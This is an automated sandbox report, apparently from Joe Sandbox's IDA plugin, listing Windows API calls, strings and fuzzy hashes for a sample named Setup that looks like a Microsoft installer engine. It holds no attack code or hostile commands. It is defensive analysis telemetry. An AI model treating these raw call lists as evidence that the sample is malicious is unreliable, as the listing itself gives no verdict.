                                                                                              • String ID: can only have one logical or arithmietic expression for a child node$ParameterInfo.xml$schema validation failure:
                                                                                              • API String ID: 2489616738-4045823434
                                                                                              • Opcode ID: ba6cd557cf737cb7ca4a42082eafacbdd2ddbd3bab32aa017f1b91e6c27fca2d
                                                                                              • Instruction ID: 1d33d71618b5ff6008db72eba58c3f5f38ff7c69ae148f5860afc60a73014e7e
                                                                                              • Opcode Fuzzy Hash: ba6cd557cf737cb7ca4a42082eafacbdd2ddbd3bab32aa017f1b91e6c27fca2d
                                                                                              • Instruction Fuzzy Hash: 36414F71511109AFCB10DFA8CA45BEEB7B9BF15328F148559E424DB780CB34EA09DB61
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8D1C35
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                                • Part of subcall function 6C8D19AD: __EH_prolog3.LIBCMT ref: 6C8D19B4
                                                                                                • Part of subcall function 6C8D19AD: __CxxThrowException@8.LIBCMT ref: 6C8D1ADE
                                                                                                • Part of subcall function 6C8C8AAC: __EH_prolog3.LIBCMT ref: 6C8C8AB3
                                                                                                • Part of subcall function 6C8C8AAC: __CxxThrowException@8.LIBCMT ref: 6C8C8B39
                                                                                                • Part of subcall function 6C8C92D1: __EH_prolog3.LIBCMT ref: 6C8C92D8
                                                                                                • Part of subcall function 6C8C838A: __EH_prolog3.LIBCMT ref: 6C8C8391
                                                                                                • Part of subcall function 6C8CA378: __EH_prolog3.LIBCMT ref: 6C8CA37F
                                                                                              • __CxxThrowException@8.LIBCMT ref: 6C8D1D02
                                                                                                • Part of subcall function 6C9214AA: KiUserExceptionDispatcher.NTDLL(?,?,6C91C129,00000C00,?,?,?,?,6C91C129,00000C00,6C93BA3C,6C9576D4,00000C00,00000020,6C8FF845,?), ref: 6C9214EC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$Exception@8Throw$DispatcherExceptionUser
                                                                                              • String ID: IsPresent$ParameterInfo.xml$schema validation failure: IsPresent can only be authored once.
                                                                                              • API String ID: 2724732616-4158871691
                                                                                              • Opcode ID: 534316091a638a9a6951896532149dfda31369ede12ab3445dfcd0952967a9cb
                                                                                              • Instruction ID: 3782823f842688b0363b3690a549ca50b23c344d418c2965aae6d5416e978013
                                                                                              • Opcode Fuzzy Hash: 534316091a638a9a6951896532149dfda31369ede12ab3445dfcd0952967a9cb
                                                                                              • Instruction Fuzzy Hash: 27219071810148BACF20DBE8CA45ADD7BB8AF25318F148959F064ABB80CB70DB0CD762
                                                                                              APIs
                                                                                              • CheckTokenMembership.KERNELBASE(00000000,?,?), ref: 6C90365F
                                                                                              • GetLastError.KERNEL32 ref: 6C903669
                                                                                                • Part of subcall function 6C8C7479: __EH_prolog3.LIBCMT ref: 6C8C7480
                                                                                              • GetLastError.KERNEL32 ref: 6C90368B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$CheckH_prolog3MembershipToken
                                                                                              • String ID: AllocateAndInitializeSid$CheckTokenMembership
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8D58FC
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                                • Part of subcall function 6C8CA8CC: __EH_prolog3.LIBCMT ref: 6C8CA8D3
                                                                                                • Part of subcall function 6C8CA8CC: PathIsRelativeW.SHLWAPI(00000000,00000000,?,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C8CA90B
                                                                                                • Part of subcall function 6C8CA8CC: GetModuleFileNameW.KERNEL32(00000010,00000104,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C8CA964
                                                                                                • Part of subcall function 6C8CA8CC: __CxxThrowException@8.LIBCMT ref: 6C8CAA28
                                                                                              • StrPBrkW.SHLWAPI(00000000,) <>",#(loc.,?,6C8FFA6E,6C8FFA6E,00000718,02F92298,?,00000000,00000010,6C8D6171,00000000,00000748,?,ParameterInfo.xml), ref: 6C8D5972
                                                                                              • SysFreeString.OLEAUT32(6C8FFA6E), ref: 6C8D59A3
                                                                                                • Part of subcall function 6C918C9E: _memcpy_s.LIBCMT ref: 6C918CE4
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$Exception@8FileFreeModuleNamePathRelativeStringThrow_memcpy_s
                                                                                              • String ID: #(loc.$) <>"
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8F5874
                                                                                              • OpenMutexW.KERNEL32(00100000,00000000,00000030,?,Global\,00000000,6C90BDA7,?,00000000,?,?,?,?,?,Command-line option error: ,?), ref: 6C8F58FB
                                                                                              • CreateMutexW.KERNEL32(00000000,00000000,00000030), ref: 6C8F590B
                                                                                              • GetLastError.KERNEL32 ref: 6C8F5913
                                                                                                • Part of subcall function 6C8F8CD5: __EH_prolog3.LIBCMT ref: 6C8F8CDC
                                                                                              Similarity
                                                                                              • API ID: H_prolog3Mutex$CreateErrorLastOpen
                                                                                              • String ID: Global\
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8E4A46
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              • String ID: evaluates to 'in maintenance mode'$ evaluates to 'not in maintenance mode'$MaintenanceMode determination$evaluating EnterMaintenanceModeIf
                                                                                              APIs
                                                                                              • EnterCriticalSection.KERNEL32(?,38D98A99), ref: 6C90FF9B
                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 6C910900
                                                                                                • Part of subcall function 6C8C4CB2: __EH_prolog3.LIBCMT ref: 6C8C4CB9
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                                • Part of subcall function 6C8F8CD5: __EH_prolog3.LIBCMT ref: 6C8F8CDC
                                                                                                • Part of subcall function 6C8C391D: __EH_prolog3.LIBCMT ref: 6C8C3924
                                                                                                • Part of subcall function 6C91C0AA: _malloc.LIBCMT ref: 6C91C0C4
                                                                                                • Part of subcall function 6C8E24CD: __EH_prolog3.LIBCMT ref: 6C8E24D4
                                                                                                • Part of subcall function 6C8E24CD: __CxxThrowException@8.LIBCMT ref: 6C8E255B
                                                                                                • Part of subcall function 6C912306: __EH_prolog3.LIBCMT ref: 6C91230D
                                                                                                • Part of subcall function 6C914C0C: __EH_prolog3.LIBCMT ref: 6C914C13
                                                                                                • Part of subcall function 6C8FBC09: __EH_prolog3.LIBCMT ref: 6C8FBC10
                                                                                                • Part of subcall function 6C914EE6: __EH_prolog3.LIBCMT ref: 6C914EED
                                                                                                • Part of subcall function 6C914EE6: __recalloc.LIBCMT ref: 6C914EFB
                                                                                                • Part of subcall function 6C914EE6: __recalloc.LIBCMT ref: 6C914F17
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$CriticalSection__recalloc$EnterException@8LeaveThrow_malloc
                                                                                              • String ID: determination is complete$Applicability for $evaluating each item
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C90A4B6
                                                                                              • GetTokenInformation.KERNELBASE(?,00000001,00000000,00000000,?,?,?,6C90A210,?,00000000,?,?,6C8F4B23), ref: 6C90A523
                                                                                              • GetTokenInformation.KERNELBASE(?,00000001,00000000,00000008,00000008,00000008,?,?,6C90A210,?,00000000,?,?,6C8F4B23), ref: 6C90A566
                                                                                              • LookupAccountSidW.ADVAPI32(00000000,00000000,00000000,00000008,00000010,00000008,6C8F4614,00000008,00000104,?,?,6C90A210,?,00000000), ref: 6C90A59C
                                                                                                • Part of subcall function 6C918AFC: _wcsnlen.LIBCMT ref: 6C918B0C
                                                                                              • CloseHandle.KERNEL32(?,?,?,6C90A210,?,00000000,?,?,6C8F4B23), ref: 6C90A5CF
                                                                                              Similarity
                                                                                              • API ID: InformationToken$AccountCloseH_prolog3HandleLookup_wcsnlen
                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 6C8F488A
                                                                                                • Part of subcall function 6C8F31D3: __EH_prolog3_catch.LIBCMT ref: 6C8F31DA
                                                                                                • Part of subcall function 6C8F31D3: _free.LIBCMT ref: 6C8F3269
                                                                                              • GetCurrentThread.KERNEL32 ref: 6C8F495F
                                                                                              • OpenThreadToken.ADVAPI32(00000000,00000008,00000001,?), ref: 6C8F4971
                                                                                              • GetCurrentProcess.KERNEL32 ref: 6C8F497B
                                                                                              • OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 6C8F498B
                                                                                              Similarity
                                                                                              • API ID: CurrentOpenProcessThreadToken$H_prolog3_H_prolog3_catch_free
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8D5CE8
                                                                                                • Part of subcall function 6C8CA8CC: __EH_prolog3.LIBCMT ref: 6C8CA8D3
                                                                                                • Part of subcall function 6C8CA8CC: PathIsRelativeW.SHLWAPI(00000000,00000000,?,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C8CA90B
                                                                                                • Part of subcall function 6C8CA8CC: GetModuleFileNameW.KERNEL32(00000010,00000104,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C8CA964
                                                                                                • Part of subcall function 6C8CA8CC: __CxxThrowException@8.LIBCMT ref: 6C8CAA28
                                                                                              • CoInitialize.OLE32(00000000), ref: 6C8D5D1A
                                                                                              • CoCreateInstance.OLE32(6C8BA974,00000000,00000017,6C8BA9A4,?,?,?,00000014,6C8D5F14,?,?,?,?,38D98A99,ParameterInfo.xml,00000000), ref: 6C8D5D38
                                                                                              • CoUninitialize.COMBASE(?,?,00000014,6C8D5F14,?,?,?,?,38D98A99,ParameterInfo.xml,00000000,?,ParameterInfo.xml,?,00000000,?), ref: 6C8D5DE8
                                                                                              • SysFreeString.OLEAUT32(00000738), ref: 6C8D5DF1
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$CreateException@8FileFreeInitializeInstanceModuleNamePathRelativeStringThrowUninitialize
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C909BC3
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                                • Part of subcall function 6C8CA8CC: __EH_prolog3.LIBCMT ref: 6C8CA8D3
                                                                                                • Part of subcall function 6C8CA8CC: PathIsRelativeW.SHLWAPI(00000000,00000000,?,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C8CA90B
                                                                                                • Part of subcall function 6C8CA8CC: GetModuleFileNameW.KERNEL32(00000010,00000104,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C8CA964
                                                                                                • Part of subcall function 6C8CA8CC: __CxxThrowException@8.LIBCMT ref: 6C8CAA28
                                                                                              • GetCommandLineW.KERNEL32(?,?,6C8BA794,?,?,00000164,6C8E4730,02F92298,6C8BA794,?,?,?,6C90B57F,?,00000000,?), ref: 6C909BEF
                                                                                                • Part of subcall function 6C8C3E77: __EH_prolog3.LIBCMT ref: 6C8C3E7E
                                                                                              • SysFreeString.OLEAUT32(?), ref: 6C909C42
                                                                                              • SysFreeString.OLEAUT32(6C8FFA6E), ref: 6C909CCC
                                                                                              • SysFreeString.OLEAUT32(?), ref: 6C909CF3
                                                                                                • Part of subcall function 6C8E473C: __EH_prolog3_catch.LIBCMT ref: 6C8E4746
                                                                                                • Part of subcall function 6C8E473C: CoInitialize.OLE32(00000000), ref: 6C8E47F7
                                                                                                • Part of subcall function 6C8E473C: CoCreateInstance.OLE32(6C8BA974,00000000,00000017,6C8BA9A4,?,?,?,?,?,6C8C3864,?,00000000,00000000,6C8FFA6E,00000738,IronMan::EngineData::CreateEngineData), ref: 6C8E4815
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$FreeString$CommandCreateException@8FileH_prolog3_catchInitializeInstanceLineModuleNamePathRelativeThrow
                                                                                              • String ID:
                                                                                              • API String ID: 3727545618-0
                                                                                              APIs
                                                                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 63965F27
                                                                                              • GetWindowLongW.USER32(?,000000FC), ref: 63965F3E
                                                                                              • CallWindowProcW.USER32(?,?,00000082,?,?), ref: 63965F50
                                                                                              • GetWindowLongW.USER32(?,000000FC), ref: 63965F6A
                                                                                              • SetWindowLongW.USER32(?,000000FC,?), ref: 63965F79
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Long$CallProc
                                                                                              • String ID:
                                                                                              • API String ID: 513923721-0
                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 6395665C
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                                • Part of subcall function 6395F35E: __EH_prolog3.LIBCMT ref: 6395F365
                                                                                                • Part of subcall function 6395F35E: __recalloc.LIBCMT ref: 6395F3A7
                                                                                              • _memset.LIBCMT ref: 639566C3
                                                                                              • GetClientRect.USER32 ref: 639566E6
                                                                                              • SendMessageW.USER32(00000001,00000432,00000000,?), ref: 639566FC
                                                                                                • Part of subcall function 639681DE: _memcpy_s.LIBCMT ref: 63968224
                                                                                              • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,?,00000040,6395730F,?,?,?,?,?,?,?,?,?), ref: 63956713
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$ClientExceptionH_prolog3_MessageRaiseRectSend__recalloc_memcpy_s_memset
                                                                                              • String ID:
                                                                                              • API String ID: 4097222183-0
                                                                                              APIs
                                                                                              • _malloc.LIBCMT ref: 6C920F72
                                                                                                • Part of subcall function 6C91BFB3: __FF_MSGBANNER.LIBCMT ref: 6C91BFCC
                                                                                                • Part of subcall function 6C91BFB3: __NMSG_WRITE.LIBCMT ref: 6C91BFD3
                                                                                                • Part of subcall function 6C91BFB3: RtlAllocateHeap.NTDLL(00000000,00000001,?,6C8F831D,00000000,?,6C91C0C9,6C8FF845,00000C00,00000020,6C8FF845,?), ref: 6C91BFF8
                                                                                              • _free.LIBCMT ref: 6C920F85
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap_free_malloc
                                                                                              • String ID:
                                                                                              • API String ID: 1020059152-0
                                                                                              APIs
                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,00000000), ref: 6C8E5254
                                                                                              • _memset.LIBCMT ref: 6C8E526E
                                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 6C8E5288
                                                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 6C8E52A3
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 6C8E52B7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memset
                                                                                              • String ID:
                                                                                              • API String ID: 2526126748-0
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?), ref: 6394F257
                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 6394F286
                                                                                              • ShowWindow.USER32(00000000,00000005), ref: 6394F28F
                                                                                              • ShowWindow.USER32(00000000,00000000), ref: 6394F2A5
                                                                                              • KiUserCallbackDispatcher.NTDLL(00000000,00000000), ref: 6394F2AE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Show$CallbackDispatcherItemTextUser
                                                                                              • String ID:
                                                                                              • API String ID: 3009180066-0
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8D2E4F
                                                                                                • Part of subcall function 6C8F9653: _free.LIBCMT ref: 6C8F9698
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3_free
                                                                                              • String ID: evaluated to false$ evaluated to true$BlockIf
                                                                                              • API String ID: 2248394366-2909538125
                                                                                              APIs
                                                                                              • __CxxThrowException@8.LIBCMT ref: 6C8F45A2
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                                • Part of subcall function 6C8C8329: __EH_prolog3.LIBCMT ref: 6C8C8330
                                                                                                • Part of subcall function 6C8C8129: SetFilePointer.KERNEL32(?,?,?,00000000,?,?,?,6C8CAA3A,?,00000000,00000000,00000002,?,80000000,00000001,00000003), ref: 6C8C8149
                                                                                              Strings
                                                                                              • .htm, xrefs: 6C8F4763
                                                                                              • Cannot create file or delete file in Temp directory , xrefs: 6C8F45C5
                                                                                              • Cannot get valid temp folder, xrefs: 6C8F456D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$Exception@8FilePointerThrow
                                                                                              • String ID: .htm$Cannot create file or delete file in Temp directory $Cannot get valid temp folder
                                                                                              • API String ID: 1975055723-2150540039
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8E2E83
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                                • Part of subcall function 6C8E2DBC: __EH_prolog3.LIBCMT ref: 6C8E2DC3
                                                                                                • Part of subcall function 6C8F91D4: __EH_prolog3.LIBCMT ref: 6C8F91DB
                                                                                                • Part of subcall function 6C8F91D4: __recalloc.LIBCMT ref: 6C8F921D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$__recalloc
                                                                                              • String ID: No ProcessBlock element$ProcessBlock added$ProcessBlocks
                                                                                              • API String ID: 1900422986-3251087430
                                                                                              • Opcode ID: 46f1e4835997741ad51a7a3145e114bb785acd98e55a547d3a01d18ffc39b314
                                                                                              • Instruction ID: 8f86901ba4069ae8d13bc468a88f997f3c22f4806bd715bff546f5cedbb68486
                                                                                              • Opcode Fuzzy Hash: 46f1e4835997741ad51a7a3145e114bb785acd98e55a547d3a01d18ffc39b314
                                                                                              • Instruction Fuzzy Hash: 86716170A0024ADFCF10CFA8CA84AADBBB5BF49308F144869E515EB791C7359E45CB61
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8E31CB
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                                • Part of subcall function 6C8E3104: __EH_prolog3.LIBCMT ref: 6C8E310B
                                                                                                • Part of subcall function 6C8F91D4: __EH_prolog3.LIBCMT ref: 6C8F91DB
                                                                                                • Part of subcall function 6C8F91D4: __recalloc.LIBCMT ref: 6C8F921D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$__recalloc
                                                                                              • String ID: No ServiceBlock element$ServiceBlock added$ServiceBlocks
                                                                                              • API String ID: 1900422986-3373415214
                                                                                              • Opcode ID: d94714d1a96495a567de6b965e71e706b8b28dced02d7073f77941ce3ae31098
                                                                                              • Instruction ID: abcdd21b8194ac06babd0aad6d145bd4f3e0c919e2722b8e149f92dff2582842
                                                                                              • Opcode Fuzzy Hash: d94714d1a96495a567de6b965e71e706b8b28dced02d7073f77941ce3ae31098
                                                                                              • Instruction Fuzzy Hash: 69714070A00249DFCF10CFA8CA84AAEBBB5BF49308F24496DE515EB791C7359E45CB61
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6C8F72EB
                                                                                                • Part of subcall function 6C8C43C4: __EH_prolog3.LIBCMT ref: 6C8C43CB
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                                • Part of subcall function 6C8F8ED0: __EH_prolog3.LIBCMT ref: 6C8F8ED7
                                                                                                • Part of subcall function 6C8F8ED0: PathFindExtensionW.SHLWAPI(?,00000004,6C8F7362,?,?,?,00000000,?,?), ref: 6C8F8F01
                                                                                                • Part of subcall function 6C91C0AA: _malloc.LIBCMT ref: 6C91C0C4
                                                                                                • Part of subcall function 6C8F3B2B: __EH_prolog3.LIBCMT ref: 6C8F3B32
                                                                                                • Part of subcall function 6C8F3B2B: InitializeCriticalSection.KERNEL32(00000002,?,00000000,00000000,00000002,?,?,00000000,?,?,?,?,00000008,6C8FEC79,?,?), ref: 6C8F3BC9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$CriticalExtensionFindH_prolog3_catchInitializePathSection_malloc
                                                                                              • String ID: .htm$.html$.txt
                                                                                              • API String ID: 2678321574-1806469533
                                                                                              • Opcode ID: c2daf6da6cf8b8c278104573bd8b3268a377075d56804da04efbc2fb0e853a05
                                                                                              • Instruction ID: 3495629524dc22d415182d864d6b2d4d4a3de3861e604d853f5f8a6f745f5729
                                                                                              • Opcode Fuzzy Hash: c2daf6da6cf8b8c278104573bd8b3268a377075d56804da04efbc2fb0e853a05
                                                                                              • Instruction Fuzzy Hash: 9851D43090420DDEEF20DBB8CA05BDE7BE5AF25348F104965E460EBB80D774C609DB66
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorH_prolog3Last
                                                                                              • String ID: DW\DW20.exe$Failed to record SetupFlags
                                                                                              • API String ID: 685212868-3543485478
                                                                                              • Opcode ID: 6780a64aa2ead81c2085ee10872f2c246aabbaa58b907b729eb86a9cbd179cfe
                                                                                              • Instruction ID: 635f24dcd7d1235f6bd7f76f4aacad12e1cc2c040ee1c6c6b52d46fdb42bba25
                                                                                              • Opcode Fuzzy Hash: 6780a64aa2ead81c2085ee10872f2c246aabbaa58b907b729eb86a9cbd179cfe
                                                                                              • Instruction Fuzzy Hash: 6341E431900209DFCB10DFB8C945ADEBBB5BF25318F158A65E410EBB81C774DA0AD7A5
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C903440
                                                                                              • PathStripToRootW.SHLWAPI(00000000,C600000B,6C8FFA6E,00000010,?,?,00000738,6C8FFA6E,?,6C8BA794,02F92298), ref: 6C9034D8
                                                                                              • GetLastError.KERNEL32(?,?,00000738,6C8FFA6E,?,6C8BA794,02F92298), ref: 6C90350D
                                                                                              Strings
                                                                                              • Failed to record SystemMemory, xrefs: 6C903527
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
